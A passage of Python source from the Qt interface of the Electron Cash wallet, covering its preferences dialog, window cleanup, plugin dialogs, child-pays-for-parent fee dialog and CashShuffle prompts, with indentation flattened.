feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link/']) + '\n\n'\
+ _('For more information, see http://openalias.org')
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = util.base_unit_labels # ( 'BCH', 'mBCH', 'bits' )
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 bits.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
dp = util.base_units.get(unit_result)
if dp is not None:
self.decimal_point = dp
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_tabs()
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
qr_combo = QComboBox()
qr_combo.addItem(_("Default"),"default")
system_cameras = []
try:
from PyQt5.QtMultimedia import QCameraInfo
system_cameras = QCameraInfo.availableCameras()
qr_label = HelpLabel(_('Video Device') + ':', _("For scanning Qr codes."))
except ImportError as e:
# Older Qt or missing libs -- disable GUI control and inform user why
qr_combo.setEnabled(False)
qr_combo.setToolTip(_("Unable to probe for cameras on this system. QtMultimedia is likely missing."))
qr_label = HelpLabel(_('Video Device') + ' ' + _('(disabled)') + ':', qr_combo.toolTip() + "\n\n" + str(e))
qr_label.setToolTip(qr_combo.toolTip())
for cam in system_cameras:
qr_combo.addItem(cam.description(), cam.deviceName())
video_device = self.config.get("video_device")
video_device_index = 0
if video_device:
video_device_index = qr_combo.findData(video_device)
qr_combo.setCurrentIndex(video_device_index)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
theme_name = self.config.get('qt_gui_color_theme', 'default')
dark_theme_available = self.gui_object.is_dark_theme_available()
if theme_name == 'dark' and not dark_theme_available:
theme_name = 'default'
index = colortheme_combo.findData(theme_name)
if index < 0: index = 0
colortheme_combo.setCurrentIndex(index)
msg = ( _("Dark theme support requires the package 'QDarkStyle' (typically installed via the 'pip3' command on Unix & macOS).")
if not dark_theme_available
else '' )
lbltxt = _('Color theme') + ':'
colortheme_label = HelpLabel(lbltxt, msg) if msg else QLabel(lbltxt)
def on_colortheme(x):
item_data = colortheme_combo.itemData(x)
if not dark_theme_available and item_data == 'dark':
self.show_error(_("Dark theme is not available. Please install QDarkStyle to access this feature."))
colortheme_combo.setCurrentIndex(0)
return
self.config.set_key('qt_gui_color_theme', item_data, True)
if theme_name != item_data:
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
if sys.platform not in ('darwin',):
# Enable/Disable HighDPI -- this option makes no sense for macOS
# and thus does not appear on that platform
hidpi_chk = QCheckBox(_('Automatic high DPI scaling'))
if sys.platform in ('linux',):
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as overly large status bar icons)"))
else: # windows
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as dialog box text being cut off"))
hidpi_chk.setChecked(bool(self.config.get('qt_enable_highdpi', True)))
if self.config.get('qt_disable_highdpi'):
hidpi_chk.setToolTip(_('Automatic high DPI scaling was disabled from the command-line'))
hidpi_chk.setChecked(False)
hidpi_chk.setDisabled(True)
def on_hi_dpi_toggle():
self.config.set_key('qt_enable_highdpi', hidpi_chk.isChecked())
self.need_restart = True
hidpi_chk.stateChanged.connect(on_hi_dpi_toggle)
gui_widgets.append((hidpi_chk, None))
# CashAddr control
gui_widgets.append((None, None)) # spacer
address_w = QGroupBox(_('Address Format'))
address_w.setToolTip(_('Select between Cash Address and Legacy formats for addresses'))
hbox = QHBoxLayout(address_w)
cashaddr_cbox = QComboBox()
cashaddr_cbox.addItem(QIcon(':icons/tab_converter.svg'), _("CashAddr"), Address.FMT_CASHADDR)
cashaddr_cbox.addItem(QIcon(':icons/tab_converter_bw.svg'), _("Legacy"), Address.FMT_LEGACY)
cashaddr_cbox.setCurrentIndex(0 if self.gui_object.is_cashaddr() else 1)
def cashaddr_cbox_handler(ignored_param):
fmt = int(cashaddr_cbox.currentData())
self.gui_object.toggle_cashaddr(fmt == Address.FMT_CASHADDR)
cashaddr_cbox.currentIndexChanged.connect(cashaddr_cbox_handler)
hbox.addWidget(cashaddr_cbox)
toggle_cashaddr_control = QCheckBox(_('Hide status button'))
toggle_cashaddr_control.setToolTip(_('If checked, the status bar button for toggling address formats will be hidden'))
toggle_cashaddr_control.setChecked(self.gui_object.is_cashaddr_status_button_hidden())
toggle_cashaddr_control.toggled.connect(self.gui_object.set_cashaddr_status_button_hidden)
hbox.addWidget(toggle_cashaddr_control)
gui_widgets.append((address_w, None))
gui_widgets.append((None, None)) # spacer
updatecheck_cb = QCheckBox(_("Automatically check for updates"))
updatecheck_cb.setChecked(self.gui_object.has_auto_update_check())
updatecheck_cb.setToolTip(_("Enable this option if you wish to be notified as soon as a new version of Electron Cash becomes available"))
def on_set_updatecheck(v):
self.gui_object.set_auto_update_check(v == Qt.Checked)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
notify_tx_cb = QCheckBox(_('Notify when receiving funds'))
notify_tx_cb.setToolTip(_('If enabled, a system notification will be presented when you receive funds to this wallet.'))
notify_tx_cb.setChecked(bool(self.wallet.storage.get('gui_notify_tx', True)))
def on_notify_tx(b):
self.wallet.storage.put('gui_notify_tx', bool(b))
notify_tx_cb.stateChanged.connect(on_notify_tx)
per_wallet_tx_widgets.append((notify_tx_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
if self.force_use_single_change_addr:
usechange_cb.setChecked(True)
usechange_cb.setEnabled(False)
if isinstance(self.force_use_single_change_addr, str):
usechange_cb.setToolTip(self.force_use_single_change_addr)
else:
usechange_cb.setChecked(self.wallet.use_change)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
per_wallet_tx_widgets.append((usechange_cb, None))
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
if self.force_use_single_change_addr:
multiple_cb.setEnabled(False)
multiple_cb.setChecked(False)
if isinstance(self.force_use_single_change_addr, str):
multiple_cb.setToolTip(self.force_use_single_change_addr)
else:
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_cb.stateChanged.connect(on_multiple)
per_wallet_tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
global_tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(self.on_toggled_opreturn)
global_tx_widgets.append((opret_cb,None))
# Schnorr
use_schnorr_cb = QCheckBox(_("Enable Schnorr signatures"))
use_schnorr_cb.setChecked(self.wallet.is_schnorr_enabled())
use_schnorr_cb.stateChanged.connect(self.wallet.set_schnorr_enabled)
no_schnorr_reason = []
if self.wallet.is_schnorr_possible(no_schnorr_reason):
use_schnorr_cb.setEnabled(True)
use_schnorr_cb.setToolTip(_("Sign all transactions using Schnorr signatures."))
else:
# not possible (wallet type not supported); show reason in tooltip
use_schnorr_cb.setEnabled(False)
use_schnorr_cb.setToolTip(no_schnorr_reason[0])
per_wallet_tx_widgets.append((use_schnorr_cb, None))
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
c = self.fx.get_currency()
h = self.fx.get_history_config()
else:
c, h = self.fx.default_currency, False
exchanges = self.fx.get_exchanges_by_ccy(c, h)
conf_exchange = self.fx.config_exchange()
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
idx = ex_combo.findText(conf_exchange) # try and restore previous exchange if in new list
if idx < 0:
# hmm, previous exchange wasn't in new h= setting. Try default exchange.
idx = ex_combo.findText(self.fx.default_exchange)
idx = 0 if idx < 0 else idx # if still no success (idx < 0) -> default to the first exchange in combo
if exchanges: # don't set index if no exchanges, as any index is illegal. this shouldn't happen.
ex_combo.setCurrentIndex(idx) # note this will emit a currentIndexChanged signal if it's changed
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
changed = bool(self.fx.get_history_config()) != bool(checked)
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
if changed:
self.history_list.update() # this won't happen too often as it's rate-limited
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(gui_widgets, _('General')),
(fee_widgets, _('Fees')),
(OrderedDict([
( _("App-Global Options") , global_tx_widgets ),
( _("Per-Wallet Options") , per_wallet_tx_widgets),
]), _('Transactions')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
def add_tabs_info_to_tabs(tabs, tabs_info):
def add_widget_pair(a,b,grid):
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
if a:
grid.addWidget(a, i, 0, 1, 2)
else:
grid.addItem(QSpacerItem(15, 15), i, 0, 1, 2)
for thing, name in tabs_info:
tab = QWidget()
if isinstance(thing, dict):
# This Prefs tab is laid out as groupboxes one atop another...
d = thing
vbox = QVBoxLayout(tab)
for groupName, widgets in d.items():
gbox = QGroupBox(groupName)
grid = QGridLayout(gbox)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
vbox.addWidget(gbox, len(widgets))
else:
# Standard layout.. 1 tab has just a grid of widgets
widgets = thing
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
tabs.addTab(tab, name)
# / add_tabs_info_to_tabs
add_tabs_info_to_tabs(tabs, tabs_info)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
d.setParent(None) # for Python GC
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def is_alive(self): return bool(not self.cleaned_up)
def clean_up_connections(self):
def disconnect_signals():
for attr_name in dir(self):
if attr_name.endswith("_signal") and attr_name != "cashaddr_toggled_signal":
sig = getattr(self, attr_name)
if isinstance(sig, pyqtBoundSignal):
try: sig.disconnect()
except TypeError: pass # no connections
elif attr_name.endswith("__RateLimiter"): # <--- NB: this needs to match the attribute name in util.py rate_limited decorator
rl_obj = getattr(self, attr_name)
if isinstance(rl_obj, RateLimiter):
rl_obj.kill_timer()
try: self.disconnect()
except TypeError: pass
def disconnect_network_callbacks():
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
# /
disconnect_network_callbacks()
disconnect_signals()
def clean_up_children(self):
# status bar holds references to self, so clear it to help GC this window
# Note that due to quirks on macOS and the shared menu bar, we do *NOT* clear
# the menuBar. But I've found it goes away anyway on its own after window deletion.
self.setStatusBar(None)
# Reparent children to 'None' so python GC can clean them up sooner rather than later.
# This also hopefully helps accelerate this window's GC.
children = [c for c in self.children()
if (isinstance(c, (QWidget,QAction,QShortcut,TaskThread))
and not isinstance(c, (QStatusBar, QMenuBar, QFocusFrame)))]
for c in children:
try: c.disconnect()
except TypeError: pass
c.setParent(None)
def clean_up(self):
self.wallet.thread.stop()
self.wallet.thread.wait() # Join the thread to make sure it's really dead.
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.qr_window = None # force GC sooner rather than later.
for d in list(self._tx_dialogs):
# clean up all extant tx dialogs we opened as they hold references
# to us that will be invalidated
d.prompt_if_unsaved = False # make sure to unconditionally close
d.close()
self._close_wallet()
try: self.gui_object.timer.timeout.disconnect(self.timer_actions)
except TypeError: pass # defensive programming: this can happen if we got an exception before the timer action was connected
self.gui_object.close_window(self) # implicitly runs the hook: on_close_window
# Now, actually STOP the wallet's synchronizer and verifiers and remove
# it from the daemon. Note that its addresses will still stay
# 'subscribed' to the ElectrumX server until we connect to a new server,
# (due to ElectrumX protocol limitations).. but this is harmless.
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
# At this point all plugins should have removed any references to this window.
# Now, just to be paranoid, do some active destruction of signal/slot connections as well as
# Removing child widgets forcefully to speed up Python's own GC of this window.
self.clean_up_connections()
self.clean_up_children()
# And finally, print when we are destroyed by C++ for debug purposes
# We must call this here as above calls disconnected all signals
# involving this widget.
destroyed_print_error(self)
def internal_plugins_dialog(self):
if self.internalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.internalpluginsdialog.raise_()
return
d = WindowModalDialog(parent=self.top_level_window(), title=_('Optional Features'))
weakD = Weak.ref(d)
gui_object = self.gui_object
plugins = gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
weakGrid = Weak.ref(grid)
w.setLayout(grid)
settings_widgets = Weak.ValueDictionary()
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
grid = weakGrid()
d = weakD()
if d and grid and not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
if not p:
# Need to delete settings widget because keeping it around causes bugs as it points to a now-dead plugin instance
settings_widgets.pop(name)
widget.hide(); widget.setParent(None); widget.deleteLater(); widget = None
def do_toggle(weakCb, name, i):
cb = weakCb()
if cb:
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
weakCb = Weak.ref(cb)
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, weakCb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
self.internalpluginsdialog = d
d.exec_()
self.internalpluginsdialog = None # Python GC please!
def external_plugins_dialog(self):
if self.externalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.externalpluginsdialog.raise_()
return
from . import external_plugins_window
d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
self.externalpluginsdialog = d
d.exec_()
self.externalpluginsdialog = None # allow python to GC
def hardware_wallet_support(self):
if not sys.platform.startswith('linux'):
self.print_error("FIXME! hardware_wallet_support is Linux only!")
return
if self.hardwarewalletdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.hardwarewalletdialog.raise_()
return
from .udev_installer import InstallHardwareWalletSupportDialog
d = InstallHardwareWalletSupportDialog(self.top_level_window(), self.gui_object.plugins)
self.hardwarewalletdialog = d
d.exec_()
self.hardwarewalletdialog = None # allow python to GC
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self.top_level_window(), _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
result = d.exec_()
d.setParent(None) # So Python can GC
if not result:
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
def is_wallet_cashshuffle_compatible(self):
from electroncash.wallet import ImportedWalletBase, Multisig_Wallet
if (self.wallet.is_watching_only()
or self.wallet.is_hardware()
or isinstance(self.wallet, (Multisig_Wallet, ImportedWalletBase))):
# wallet is watching-only, multisig, or hardware so.. not compatible
return False
return True
_cs_reminder_pixmap = None
def do_cash_shuffle_reminder(self):
if not self.remind_cashshuffle_enabled:
# NB: This is now disabled. We return early from this function.
# Amaury recommended we do this prompting/reminder in a future
# release after the initial public release, or we roll it out
# for a subset of users (hence this flag).
return
if self.cleaned_up or not self.wallet or not self.is_wallet_cashshuffle_compatible():
return
from electroncash_plugins.shuffle.conf_keys import ConfKeys
p = self.cashshuffle_plugin_if_loaded()
storage = self.wallet.storage
cashshuffle_flag = storage.get(ConfKeys.PerWallet.ENABLED, False)
enabled = cashshuffle_flag and p and p.is_enabled()
nagger_answer = storage.get(ConfKeys.PerWallet.MAIN_WINDOW_NAGGER_ANSWER, None)
if not enabled:
if nagger_answer is None: # nagger_answer is None if they've never said "Never ask"
if __class__._cs_reminder_pixmap is None:
# lazy init. Cache it to class level.
size = QSize(150, int(150/1.4419)) # Important to preserve aspect ratio in .svg file here
# NB: doing it this way, with a QIcon, will take into account devicePixelRatio and end up possibly producing a very hi quality image from the SVG, larger than size
__class__._cs_reminder_pixmap = QIcon(":icons/CashShuffleLogos/logo-vertical.svg").pixmap(size)
icon = __class__._cs_reminder_pixmap
message = '''
<big>{}</big></b>
<p>{}</p>
'''.format(_("CashShuffle is disabled for this wallet.") if not cashshuffle_flag else _("CashShuffle is disabled."),
_("Would you like to enable CashShuffle for this wallet?"))
info = ' '.join([_("If you enable it, Electron Cash will shuffle your coins for greater <b>privacy</b>. However, you will pay fractions of a penny per shuffle in transaction fees."),
_("(You can always toggle it later using the CashShuffle button.)")])
res, chkd = self.msg_box(icon=icon,
parent=self.top_level_window(),
title=_('Would you like to turn on CashShuffle?'),
text=message, rich_text=True, informative_text=info,
checkbox_text=_("Never ask for this wallet"),
buttons=(_('Enable CashShuffle'), _("Not now")),
defaultButton=_('Enable CashShuffle'), escapeButton=("Not now") )
if chkd:
# they don't want to be asked again, so just remember what they answered and apply this answer each time.
storage.put(ConfKeys.PerWallet.MAIN_WINDOW_NAGGER_ANSWER, bool(res==0))
else:
# They's specified "Never ask", so apply whatever button they pushed when they said that as the auto-setting.
res = 0 if nagger_answer else 1 # if nagge_answer was True, no prompt, just auto-enable, otherwise leave it disabled.
if res == 0:
self.toggle_cashshuffle()
def restart_cashshuffle(self, msg = None, parent = None):
if (parent or self).question("{}{}".format(msg + "\n\n" if msg else "", _("Restart the CashShuffle plugin now?")),
app_modal=True):
p = self.cashshuffle_plugin_if_loaded()
if p:
p.restart_all()
self.notify(_("CashShuffle restarted"))
else:
self.notify(_("CashShuffle could not be restarted"))
_cash_shuffle_flag = 0
def cashshuffle_set_flag(self, flag):
flag = int(flag)
changed = flag != self._cash_shuffle_flag
if not changed:
return
if flag:
def onClick():
KillPopupLabel("CashShuffleError")
self.show_cashshuffle_settings()
ShowPopupLabel(name = "CashShuffleError",
text="<center><b>{}</b><br><small>{}</small></center>".format(_("Server Error"),_("Right-click to resolve")),
target=self.cashshuffle_status_button,
timeout=20000, onClick=onClick, onRightClick=onClick,
dark_mode = ColorScheme.dark_scheme)
else:
KillPopupLabel("CashShuffleError")
self.print_error("Cash Shuffle flag is now {}".format(flag))
oldTip = self.cashshuffle_status_button.statusTip()
self._cash_shuffle_flag = flag
self.update_status()
newTip = self.cashshuffle_status_button.statusTip()
if newTip != oldTip:
self.statusBar().showMessage(newTip, 7500)
def cashshuffle_get_flag(self):
return self._cash_shuffle_flag
def rebuild_history(self):
if self.gui_object.warn_if_no_network(self):
# Don't allow if offline mode.
return
msg = ' '.join([
_('This feature is intended to allow you to rebuild a wallet if it has become corrupted.'),
"\n\n"+_('Your entire transaction history will be downloaded again from the server and verified from the blockchain.'),
_('Just to be safe, back up your wallet file first!'),
"\n\n"+_("Rebuild this wallet's history now?")
])
if self.question(msg, title=_("Rebuild Wallet History")):
try:
self.wallet.rebuild_history()
except RuntimeError as e:
self.show_error(str(e))
def scan_beyond_gap(self):
if self.gui_object.warn_if_no_network(self):
return
from .scan_beyond_gap import ScanBeyondGap
d = ScanBeyondGap(self)
d.exec_()
d.setParent(None) # help along Python by dropping refct to 0
def copy_to_clipboard(self, text, tooltip=None, widget=None):
tooltip = tooltip or _("Text copied to clipboard")
widget = widget or self
qApp.clipboard().setText(text)
QToolTip.showText(QCursor.pos(), tooltip, widget)
class TxUpdateMgr(QObject, PrintError):
''' Manages new transaction notifications and transaction verified
notifications from the network thread. It collates them and sends them to
the appropriate GUI controls in the main_window in an efficient manner. '''
def __init__(self, main_window_parent):
assert isinstance(main_window_parent, ElectrumWindow), "TxUpdateMgr must be constructed with an ElectrumWindow as its parent"
super().__init__(main_window_parent)
self.lock = threading.Lock() # used to lock thread-shared attrs below
# begin thread-shared attributes
self.notif_q = []
self.verif_q = []
self.need_process_v, self.need_process_n = False, False
# /end thread-shared attributes
self.weakParent = Weak.ref(main_window_parent)
main_window_parent.history_updated_signal.connect(self.verifs_get_and_clear, Qt.DirectConnection) # immediately clear verif_q on history update because it would be redundant to keep the verify queue around after a history list update
main_window_parent.on_timer_signal.connect(self.do_check, Qt.DirectConnection) # hook into main_window's timer_actions function
def diagnostic_name(self):
return ((self.weakParent() and self.weakParent().diagnostic_name()) or "???") + "." + __class__.__name__
def do_check(self):
''' Called from timer_actions in main_window to check if notifs or
